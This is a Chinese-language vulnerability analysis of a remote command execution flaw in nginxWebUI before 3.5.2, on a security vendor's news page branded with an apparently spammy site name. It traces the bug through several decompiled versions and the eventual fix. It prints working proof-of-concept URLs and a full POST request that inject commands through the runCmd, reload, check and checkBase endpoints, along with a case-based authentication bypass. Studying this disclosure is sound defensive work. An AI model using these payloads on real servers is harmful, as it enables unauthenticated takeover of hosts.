威尼斯(wns8885556·CHN认证)官网-Master Platform





首页 产品与服务 解决方案 客户案例 技术支持 合作发展 关于威尼斯wns.8885556 用户退出 合作商登录 用户登录 申请试用

行业解决方案政府解决方案金融解决方案医疗解决方案教育解决方案能源解决方案物流交通解决方案

售后服务文档中心年度培训

渠道政策申请成为合作伙伴渠道专区

了解威尼斯wns8885556 公司介绍发展历程企业文化权威认可威尼斯wns8885556年刊
新闻中心公司动态行业资讯安全研究
威尼斯wns8885556
联系我们产品咨询与试用总部与分支机构

公司动态行业资讯安全研究

热门阅读

威尼斯wns8885556用户专访 | 精细化管理：医疗行业数据分类分级的策略与实践

2025-01-10

容灾演练双月报｜威尼斯wns8885556助力某特大型通信基础设施央企顺利完成多个核心系统异地容灾演练

2025-01-10

国家级｜威尼斯wns8885556、徐医附院共建项目入选工信部《2024年网络安全技术应用典型案例拟支持项目名单》

2024-12-20

全球数据跨境流动合作倡议

2024-11-22

世界互联网大会|威尼斯wns8885556数据库保险箱（DBSafe）发布！

2024-11-21

每周安全速递³²⁵｜Cl0p勒索软件团伙即将公开60多名遭受Cleo攻击的受害者名单

2025-01-03

每周安全速递³²⁴|Ascension Health遭勒索软件攻击导致560万患者信息泄露

2024-12-27

每周安全速递³²³|Cl0p勒索组织利用Cleo漏洞攻击全球企业

2024-12-20

每周安全速递³²²|Black Basta勒索软件利用社交工程与多阶段感染流程展开攻击

2024-12-13

每周安全速递³²¹|俄罗斯逮捕因涉嫌参与勒索软件团伙活动的网络犯罪分子Wazawaka

2024-12-06

nginxWebUI runCmd远程命令执行漏洞

发布时间：2023-07-14 阅读次数： 599 次

漏洞描述

nginxWebUI是一款图形化管理nginx配置的工具，能通过网页快速配置nginx的各种功能，包括HTTP和TCP协议转发、反向代理、负载均衡、静态HTML服务器以及SSL证书的自动申请、续签和配置，配置完成后可以一键生成nginx.conf文件，并控制nginx使用此文件进行启动和重载。nginxWebUI后台提供执行nginx相关命令的接口，由于未对用户的输入进行过滤，导致可在后台执行任意命令。并且该系统权限校验存在问题，导致存在权限绕过，在前台可直接调用后台接口，最终可以达到无条件远程命令执行的效果。

影响范围：

nginxWebUI < 3.5.2

漏洞复现

Poc：

url地址 + /AdminPage/conf/runCmd?cmd=命令%26%26echo%20nginx

漏洞分析（3.4.6版本）

漏洞定位：

根据gitee的更新历史https://gitee.com/cym1102/nginxWebUI，寻找开发者关于此漏洞的更新情况。

以3.4.6版本为例，反编译其jar包：

根据poc搜索/adminPage/conf，定位到路由：

\com\cym\controller\adminPage\ConfController.class 44行

然后根据poc的参数，找到runcmd方法

\com\cym\controller\adminPage\ConfController.class 274行

定义了一个runCmd方法来处理用户输入的命令并执行。根据输入的type参数，调用settingService的set方法进行设置。然后使用RuntimeUtil类来执行命令，如果是Windows系统，则使用"cmd /c start"来执行命令，如果是其他系统，则使用"/bin/sh -c"来执行命令。最后，根据执行结果返回相应的JsonResult。

这里可以对cmd参数进行拼接，操控拼接的命令进行命令执行。

3.4.7版本分析

同理定位 runcmd方法：\com\cym\controller\adminPage\ConfController.class 274行

增加了一个replaceAll方法：

效果是对；’ \\| //{ //}

对这些符号做一个转义替换、且cmd参数中要存在“nginx”字段

构造payload：

http://localhost:8080/AdminPage/conf/runCmd?cmd=calc%26%26nginx

即 calc&&nginx

3.5.2版本分析

3.4.8升级框架为solon2

3.5.2开发者对漏洞进行了更新

根据gitee的版本对比，定位到：

src/main/java/com/cym/config/AppFilter.java

加了一个过滤器，用于对请求进行过滤和拦截。首先，它检查请求的路径是否包含特定的文件夹（如/lib/、/js/、/doc/等），如果不包含，则调用frontInterceptor方法进行处理。接下来，它再次检查请求的路径是否包含/adminPage/，如果包含且不包含特定的文件夹，则调用adminInterceptor方法进行处理。最后，如果adminInterceptor返回false，则将请求设置为已处理。

但是在path().toLowerCase()将路径转换为小写，第二个if下没有将路径转化成小写。

可以在此进行大小写绕过。

3.6.3版本分析

\com\cym\controller\adminPage\ConfController.class 316行

定义了一个私有的isAvailableCmd(String cmd)方法，通过switch语句，根据cmd的哈希值进行匹配，判断cmd是否和预定义的命令匹配。匹配成功则返回true，即命令可用。

相当于彻底写死，只执行预定义的、与nginx相关的命令，而不是其他命令。

抛砖引玉：

写完这篇文章后看到了白给师傅的poc补充，他补充了关于此漏洞的另外几个命令执行点，和文件上传点，非常牛逼，值得思考和学习。

大佬文章：

https://mp.weixin.qq.com/s/oKsR7bm3tleJIS675Qt0RA

补充：

命令执行点1

com.cym.controller.adminPage.ConfController#reload()方法

Payload

http://localhost:8080/AdminPage/conf/reload?nginxExe=calc%20%7C

命令执行点2

com.cym.controller.adminPage.ConfController#check()方法

Payload：

POST /AdminPage/conf/check HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 151
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SOLONID=1788f71299dc4608a355ff347bf429fa
Connection: close
nginxExe=calc%20%7C&json=%7B%22nginxContent%22%3A%22TES%22%2C%22subContent%22%3A%5B%22A%22%5D%2C%22subName%22%3A%5B%22A%22%5D%7D&nginxPath=C%3A%5CUsers

命令执行点3

com.cym.controller.adminPage.ConfController#checkBase()方法，此方法从设置中获取nginxExe nginxDir两个属性后拼接到命令再造成命令执行漏洞

payload

//第一步设置属性

http://localhost:8080/AdminPage/conf/saveCmd?nginxExe=calc%20%7c&nginxPath=a&nginxDir=a

//第二步执行命令

http://localhost:8080/AdminPage/conf/checkBase

任意文件上传1

com/cym/controller/adminPage/MainController.java

任意文件上传2

com/cym/controller/adminPage/ServerController.java

上一条：【漏洞通告】Linux Kernel 本地权限提升漏洞（CVE-2023-31248）
下一条：每周安全速递²⁶⁷|研究人员发现ARCrypt勒索软件新变种